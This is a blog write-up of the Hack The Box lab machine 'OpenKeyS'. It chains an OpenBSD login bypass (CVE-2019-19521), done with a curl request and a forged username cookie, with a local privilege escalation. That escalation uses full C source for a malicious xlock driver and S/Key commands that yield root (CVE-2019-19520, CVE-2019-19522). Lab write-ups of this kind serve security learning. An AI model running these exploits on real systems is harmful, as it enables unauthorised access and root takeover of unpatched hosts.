<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Hackthebox - OpenkeyS" /><meta property="og:locale" content="en" /><meta name="description" content="Just another hackthebox writeups website powered by poorduck" /><meta property="og:description" content="Just another hackthebox writeups website powered by poorduck" /><link rel="canonical" href="https://x00tex.github.io/posts/openkeyS/" /><meta property="og:url" content="https://x00tex.github.io/posts/openkeyS/" /><meta property="og:site_name" content="Poorduck" /><meta property="og:image" content="https://x00tex.github.io/assets/img/posts/openkeys/openkeys_banner.png" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-10-13T18:30:00+00:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://x00tex.github.io/assets/img/posts/openkeys/openkeys_banner.png" /><meta property="twitter:title" content="Hackthebox - OpenkeyS" /><meta name="twitter:site" content="@p00rduck" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-05-16T12:39:32+00:00","datePublished":"2020-10-13T18:30:00+00:00","description":"Just another hackthebox writeups website powered by poorduck","headline":"Hackthebox - OpenkeyS","image":"https://x00tex.github.io/assets/img/posts/openkeys/openkeys_banner.png","mainEntityOfPage":{"@type":"WebPage","@id":"https://x00tex.github.io/posts/openkeyS/"},"url":"https://x00tex.github.io/posts/openkeyS/"}</script><title>Hackthebox - OpenkeyS | Poorduck</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Poorduck"><meta name="application-name" content="Poorduck"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" /assets/img/poorduck.png " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Poorduck</a></div><div class="site-subtitle font-italic">Kwak kwak</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/x00tex" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/p00rduck" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['x00tex-writeups.3us6n','simplelogin.co'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Hackthebox - OpenkeyS</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Hackthebox - OpenkeyS</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/p00rduck">p00rduck</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1602613800" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2020-10-13 </em> </span> <span> Updated <em class="timeago" data-ts="1652704772" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2022-05-16 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="827 words"> <em>4 min</em> read</span></div></div></div><div class="post-content"><p><img data-src="/assets/img/posts/openkeys/openkeys_banner.png" alt="" data-proofer-ignore></p><p align="right"> <a href="https://www.hackthebox.eu/home/users/profile/391067" target="_blank"><img loading="lazy" alt="x00tex" data-src="https://www.hackthebox.eu/badge/image/391067" data-proofer-ignore></a></p><h1 id="scanning">Scanning</h1><h2 id="nmap"><span class="mr-2">Nmap</span><a href="#nmap" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p><code class="language-plaintext highlighter-rouge">ports=$(nmap -Pn -p- --min-rate=1000 -T4 10.10.10.199 | grep open | awk -F / '{print $1}' ORS=',') echo $ports &amp;&amp; nmap -p$ports -sV -sC -v -T4 -oA scans/nmap.full 10.10.10.199</code></p><div class="language-diff highlighter-rouge"><div class="code-header"> <span data-label-text="Diff"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="p">PORT   STATE SERVICE VERSION
</span><span class="gi">+22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
+80/tcp open  http    OpenBSD httpd
</span><span class="err">|_http-title:</span> Site doesn't have a title (text/html).
<span class="p">Device type: general purpose|firewall
Running (JUST GUESSING): OpenBSD 4.X|6.X|5.X|3.X (95%)
</span></pre></table></code></div></div><ul><li><strong>OS :</strong> OpenBSD</ul><h2 id="web_server"><span class="mr-2">Web_server</span><a href="#web_server" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><h3 id="gobuster"><span class="mr-2">Gobuster</span><a href="#gobuster" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><code class="language-plaintext highlighter-rouge">gobuster dir -u 10.10.10.199 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40</code></p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>/includes (Status: 301)
</pre></table></code></div></div><ul><li><p>10.10.10.199 on port 80 has a login page</p><p><strong>Title :</strong> OpenKeyS - Retrieve your OpenSSH Keys</p><li><p>http://10.10.10.199/includes/</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>Index of /includes/

../                                                23-Jun-2020 08:18                   -
auth.php                                           22-Jun-2020 13:24                1373
auth.php.swp                                       17-Jun-2020 14:57               12288
</pre></table></code></div></div><li>Swap file created by the Vi text editor or one of its variants such as Vim (Vi iMproved) and gVim; stores the recovery version of a file that is being edited in the program; also serves as a lock file so that no other Vi editing session can concurrently write to the file.<li><p><code class="language-plaintext highlighter-rouge">strings</code> auth.php.swp get a <strong>username: jennifer</strong></p><li><p><strong>Recover <code class="language-plaintext highlighter-rouge">auth.php</code> file</strong></p><p><code class="language-plaintext highlighter-rouge">vim -r auth.php.swp</code></p><p><strong>Inside auth.php file</strong></p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>function authenticate($username, $password)
{
    $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
    system($cmd, $retcode);
    return $retcode;
}
</pre></table></code></div></div><ul><li>The PHP script makes use of <code class="language-plaintext highlighter-rouge">/auth_helpers/check_auth</code> to authenticate users.<li><p>try to get the file, which is an OpenBSD shared object.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>http://10.10.10.199/auth_helpers/check_auth

-rw-r--r-- 1 x00tex x00tex 12288 Oct 14 10:21 check_auth
</pre></table></code></div></div></ul><li><p><strong>check_auth file</strong></p><li>file is not executing in linux because it made form OpenBSD.<li>i search for <code class="language-plaintext highlighter-rouge">OpenBSD check_auth</code> and found Authentication Bypass and Local Privilege Escalation Vulnerabilities.</ul><h1 id="user-exploit">User Exploit</h1><p><strong>Exploit :</strong> CVE-2019-19521 (Authentication Bypass)</p><p><strong>Report :</strong> <a href="https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt">qualys.com</a></p><p><strong>Exploit surface:</strong> if an attacker specifies the username “-schallenge” (or “-schallenge:passwd” to force a passwd-style authentication), then the authentication is automatically successful and therefore bypassed.</p><ul><li>but still getting Authentication denied error<li><p>i don’t find the use of username that i found and when using <code class="language-plaintext highlighter-rouge">-schallenge</code> as username it gives an error</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>OpenSSH key not found for user "-schallenge"
</pre></table></code></div></div><li><p>in auth.php script, there are some session variables defined that applicable in session cookie.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>function init_session()
{
    $_SESSION["logged_in"] = True;
    $_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
    $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
    $_SESSION["username"] = $_REQUEST['username'];
}
</pre></table></code></div></div><li><p>there is also a <code class="language-plaintext highlighter-rouge">username</code> variable available,</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>$_SESSION["username"] = $_REQUEST['username'];
</pre></table></code></div></div><li><p>send request with <code class="language-plaintext highlighter-rouge">username=jennifer</code></p><p><code class="language-plaintext highlighter-rouge">curl -L http://10.10.10.199/index.php -d "username=-schallenge&amp;password=password" -b "PHPSESSID=qqe08df89r71d7jb7i869857uh;username=jennifer"</code></p><p><strong>output</strong>, get ssh_key for user jennifer</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>OpenSSH key for user jennifer
  
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
...
qtQ5OEFcmVIA/VAAAAG2plbm5pZmVyQG9wZW5rZXlzLmh0Yi5sb2NhbAECAwQFBgc=
-----END OPENSSH PRIVATE KEY-----
</pre></table></code></div></div></ul><h2 id="ssh"><span class="mr-2">ssh</span><a href="#ssh" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><p><code class="language-plaintext highlighter-rouge">chmod 600 ssh_key</code></p><p><code class="language-plaintext highlighter-rouge">ssh -i ssh_key jennifer@10.10.10.199</code></p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>openkeys$ whoami         
jennifer
openkeys$ cat user.txt
36ab2123************************
</pre></table></code></div></div><h2 id="local-enumeration"><span class="mr-2">Local Enumeration</span><a href="#local-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>openkeys$ uname -a
OpenBSD openkeys.htb 6.6 GENERIC#353 amd64
</pre></table></code></div></div><p><strong>OpenBSD version :</strong> 6.6</p><p><strong>Local Exploit :</strong> CVE-2019-19520: Local privilege escalation via xlock <em>from that same “qualys” report</em></p><p><strong>vulnerability :</strong> On OpenBSD, /usr/X11R6/bin/xlock is installed by default and is set-group-ID “auth”, not set-user-ID; the following check is therefore incomplete and should use issetugid() instead, A local attacker can exploit this vulnerability and dlopen() their own driver to obtain the privileges of the group “auth”.</p><p><strong>Local Exploit :</strong> CVE-2019-19522: Local privilege escalation via S/Key and YubiKey <em>from that same “qualys” report</em></p><p><strong>vulnerability :</strong> If the S/Key or YubiKey authentication type is enabled, then a local attacker can exploit the privileges of the group “auth” to obtain the full privileges of the user “root”</p><ul><li>so there are two exploit to get root <strong>First</strong> get into <strong>“auth”</strong> group using CVE-2019-19520 and <strong>then</strong> get <strong>“root”</strong> using CVE-2019-19522</ul><h1 id="root-exploit">Root Exploit</h1><ul><li><p>I found a script that automatically done that work.</p><p><a href="https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot">Script</a></p></ul><h2 id="manual"><span class="mr-2">Manual</span><a href="#manual" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2></h2><h3 id="cve-2019-19520"><span class="mr-2">CVE-2019-19520</span><a href="#cve-2019-19520" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><strong>First</strong>, create <code class="language-plaintext highlighter-rouge">swrast_dri.c</code> file -</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>openkeys$ cat &gt; swrast_dri.c &lt;&lt; "EOF"
#include &lt;paths.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;unistd.h&gt;

static void __attribute__ ((constructor)) _init (void) {
    gid_t rgid, egid, sgid;
    if (getresgid(&amp;rgid, &amp;egid, &amp;sgid) != 0) _exit(__LINE__);
    if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);

    char * const argv[] = { _PATH_KSHELL, NULL };
    execve(argv[0], argv, NULL);
    _exit(__LINE__);
}
EOF
</pre></table></code></div></div><p><strong>Second</strong>, compile it -</p><div class="language-diff highlighter-rouge"><div class="code-header"> <span data-label-text="Diff"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="p">openkeys$ gcc -fpic -shared -s -o swrast_dri.so swrast_dri.c
</span>
openkeys$ ls
<span class="p">swrast_dri.c  swrast_dri.so
</span></pre></table></code></div></div><p><strong>Third</strong>, run -</p><div class="language-diff highlighter-rouge"><div class="code-header"> <span data-label-text="Diff"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="p">openkeys$ env -i /usr/X11R6/bin/Xvfb :66 -cc 0 &amp;
</span><span class="err">[1]</span> 56546
<span class="p">openkeys$ _XSERVTransmkdir: Owner of /tmp/.X11-unix should be set to root
openkeys$ env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display :66
openkeys$ id
</span><span class="gi">+uid=1001(jennifer) gid=11(auth) groups=1001(jennifer), 0(wheel)
</span></pre></table></code></div></div><ul><li>Now we are in <code class="language-plaintext highlighter-rouge">auth</code> group.</ul><h3 id="cve-2019-19522"><span class="mr-2">CVE-2019-19522</span><a href="#cve-2019-19522" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><strong>First</strong>, create root skey and chmod it -</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>openkeys$ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' &gt; /etc/skey/root
openkeys$ chmod 0600 /etc/skey/root
</pre></table></code></div></div><p><strong>Second</strong>, run -</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>$ env -i TERM=vt220 su -l -a skey
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN
openkeys# whoami                                                                
root
</pre></table></code></div></div><p><strong>Root shell</strong></p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>openkeys# whoami                                               
root
openkeys# root.txt
f3a553b1************************
</pre></table></code></div></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>hackthebox</a>, <a href='/categories/linux/'>linux</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/openbsd-6-6/" class="post-tag no-text-decoration" >openbsd 6.6</a> <a href="/tags/cve-2019-19521/" class="post-tag no-text-decoration" >cve-2019-19521</a> <a href="/tags/cve-2019-19520/" class="post-tag no-text-decoration" >cve-2019-19520</a> <a href="/tags/cve-2019-19522/" class="post-tag no-text-decoration" >cve-2019-19522</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hackthebox - OpenkeyS - Poorduck&amp;url=https://x00tex.github.io/posts/openkeyS/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hackthebox - OpenkeyS - Poorduck&amp;u=https://x00tex.github.io/posts/openkeyS/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https://x00tex.github.io/posts/openkeyS/&amp;text=Hackthebox - OpenkeyS - Poorduck" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/meta/">Hackthebox - Meta</a><li><a href="/posts/pandora/">Hackthebox - Pandora</a><li><a href="/posts/writer/">Hackthebox - Writer</a><li><a href="/posts/blunder/">Hackthebox - Blunder</a><li><a href="/posts/luanne/">Hackthebox - Luanne</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/command-injection/">command injection</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/file-upload/">file-upload</a> <a class="post-tag" href="/tags/rce/">rce</a> <a class="post-tag" href="/tags/ssrf/">ssrf</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/aws/">aws</a> <a class="post-tag" href="/tags/awscli/">awscli</a> <a class="post-tag" href="/tags/dns/">dns</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/unicode/"><div class="card-body"> <em class="timeago small" data-ts="1638383400" > 2021-12-01 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Unicode</h3><div class="text-muted small"><p> Enumeration IP-ADDR: 10.10.11.126 hackmedia.htb nmap scan: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux...</p></div></div></a></div><div class="card"> <a href="/posts/pikaboo/"><div class="card-body"> <em class="timeago small" data-ts="1639161000" > 2021-12-10 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Pikaboo</h3><div class="text-muted small"><p> Enumeration IP-ADDR: 10.10.10.249 pikaboo.htb nmap scan: 1 2 3 4 5 6 7 8 9 10 11 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 1...</p></div></div></a></div><div class="card"> <a href="/posts/writer/"><div class="card-body"> <em class="timeago small" data-ts="1639420200" > 2021-12-13 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox - Writer</h3><div class="text-muted small"><p> Enumeration IP-ADDR: 10.10.11.101 writer.htb nmap scan: 1 2 3 4 5 6 7 8 9 10 11 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/jewel/" class="btn btn-outline-primary" prompt="Older"><p>Hackthebox - Jewel</p></a> <a href="/posts/bucket/" class="btn btn-outline-primary" prompt="Newer"><p>Hackthebox - Bucket</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/p00rduck">p00rduck</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered 